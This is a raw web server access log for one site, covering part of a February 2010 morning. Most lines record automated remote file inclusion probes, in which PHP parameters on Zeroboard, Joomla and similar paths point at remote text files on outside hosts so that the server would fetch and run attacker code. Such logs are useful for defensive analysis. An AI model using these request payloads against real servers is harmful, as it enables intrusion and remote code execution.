79.99.44.89 - - [21/Feb/2010:04:02:31 -0800] "GET /logs/access_100119.log%20%20//bbs/kr_shop.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [21/Feb/2010:04:03:22 -0800] "GET /logs/access_100119.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:03:45 -0800] "GET /logs/access_100128.log///write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:03:45 -0800] "GET //write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:03:46 -0800] "GET /logs///write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:03:52 -0800] "GET /logs/access_100128.log///write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:03:52 -0800] "GET //write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:03:53 -0800] "GET /logs///write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [21/Feb/2010:04:03:58 -0800] "GET /logs//?INCLUDE_FOLDER=http://cyber-cigarette.fr/includes/test.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
200.150.6.42 - - [21/Feb/2010:04:03:59 -0800] "GET /?INCLUDE_FOLDER=http://cyber-cigarette.fr/includes/test.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:04:21 -0800] "GET /logs/access_100214.log///write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:04:23 -0800] "GET /logs/access_100214.log///write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:05:56 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:05:56 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:05:56 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:07:31 -0800] "GET /logs/access_100124.log%20%20///write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:07:41 -0800] "GET /logs/access_100124.log%20%20///write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [21/Feb/2010:04:07:50 -0800] "GET /logs/access_100114.log//?INCLUDE_FOLDER=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [21/Feb/2010:04:07:50 -0800] "GET /logs//?INCLUDE_FOLDER=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [21/Feb/2010:04:07:52 -0800] "GET /?INCLUDE_FOLDER=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:08:02 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:08:02 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:08:02 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:08:14 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:08:14 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:08:15 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [21/Feb/2010:04:08:18 -0800] "GET /logs/access_100201.log//?INCLUDE_FOLDER=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:08:37 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:08:37 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:08:37 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:08:38 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:08:56 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:09:01 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:09:04 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:09:04 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:09:16 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:09:16 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:09:16 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:13:11 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:13:11 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:13:11 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [21/Feb/2010:04:13:51 -0800] "GET /logs//?INCLUDE_FOLDER=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [21/Feb/2010:04:13:51 -0800] "GET /logs/access_100114.log//?INCLUDE_FOLDER=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [21/Feb/2010:04:13:51 -0800] "GET /?INCLUDE_FOLDER=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [21/Feb/2010:04:14:22 -0800] "GET /logs/access_100201.log//?INCLUDE_FOLDER=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:04:14:46 -0800] "GET /logs/access_100125.log//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:04:14:46 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:04:14:46 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:14:58 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:14:58 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:14:58 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:04:15:45 -0800] "GET //?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:04:15:50 -0800] "GET /logs/access_100126.log%20%20///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:04:15:50 -0800] "GET /logs///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:04:17:01 -0800] "GET /logs/access_100117.log//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:18:06 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:18:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
91.206.206.28 - - [21/Feb/2010:04:18:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
213.179.255.82 - - [21/Feb/2010:04:23:19 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [21/Feb/2010:04:23:22 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [21/Feb/2010:04:23:22 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [21/Feb/2010:04:23:54 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [21/Feb/2010:04:23:54 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:04:24:45 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:04:24:45 -0800] "GET /logs/access_100203.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:04:24:45 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:04:25:08 -0800] "GET /logs/access_100206.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:25:19 -0800] "GET /logs/access_100114.log//?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:25:20 -0800] "GET /?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:25:21 -0800] "GET /logs//?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:25:23 -0800] "GET /logs/access_100114.log//?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:25:23 -0800] "GET /?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:25:23 -0800] "GET /logs//?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:26:52 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:26:52 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:26:52 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [21/Feb/2010:04:27:49 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.179.255.82 - - [21/Feb/2010:04:28:00 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sinhan.net/zeroboard41/icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:29:07 -0800] "GET /logs/access_100203.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:29:08 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:29:08 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:29:53 -0800] "GET /logs/access_100201.log//?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:30:01 -0800] "GET /logs/access_100206.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.122.95 - - [21/Feb/2010:04:30:16 -0800] "GET /logs/bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.122.95 - - [21/Feb/2010:04:30:16 -0800] "GET /bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.122.95 - - [21/Feb/2010:04:30:16 -0800] "GET /logs/access_100205.log/bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:04:30:29 -0800] "GET /logs/access_100201.log//?INCLUDE_FOLDER=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:30:32 -0800] "GET /logs/access_100119.log%20%20//bbs//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:04:31:08 -0800] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:04:31:08 -0800] "GET /logs/access.log%20%20/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:04:31:08 -0800] "GET /logs/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:04:33:06 -0800] "GET /logs/access_100201.log%20%20/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:04:34:40 -0800] "GET /logs/access_100202.log%20%20///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:04:34:40 -0800] "GET /logs///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:04:34:40 -0800] "GET //?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:04:34:49 -0800] "GET /logs/access_100203.log%20%20///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:04:35:00 -0800] "GET /ideal/?S=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:04:39:21 -0800] "GET /logs/access_100203.log///?_SERVER[DOCUMENT_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [21/Feb/2010:04:39:33 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [21/Feb/2010:04:39:33 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [21/Feb/2010:04:39:33 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [21/Feb/2010:04:39:35 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [21/Feb/2010:04:39:35 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [21/Feb/2010:04:39:35 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:04:39:35 -0800] "GET /logs/access_100206.log///?_SERVER[DOCUMENT_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:39:36 -0800] "GET /logs///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:39:36 -0800] "GET //administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:39:36 -0800] "GET /logs/access_100125.log///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:39:37 -0800] "GET //administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:39:37 -0800] "GET /logs///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:39:37 -0800] "GET /logs/access_100125.log///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:40:12 -0800] "GET /logs/access_100205.log///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:40:15 -0800] "GET /logs/access_100205.log///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:04:44:16 -0800] "GET /logs/access_100126.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.115.6.13 - - [21/Feb/2010:04:44:36 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "puaga.com"
78.110.50.121 - - [21/Feb/2010:04:44:42 -0800] "GET //administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:44:42 -0800] "GET /logs///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
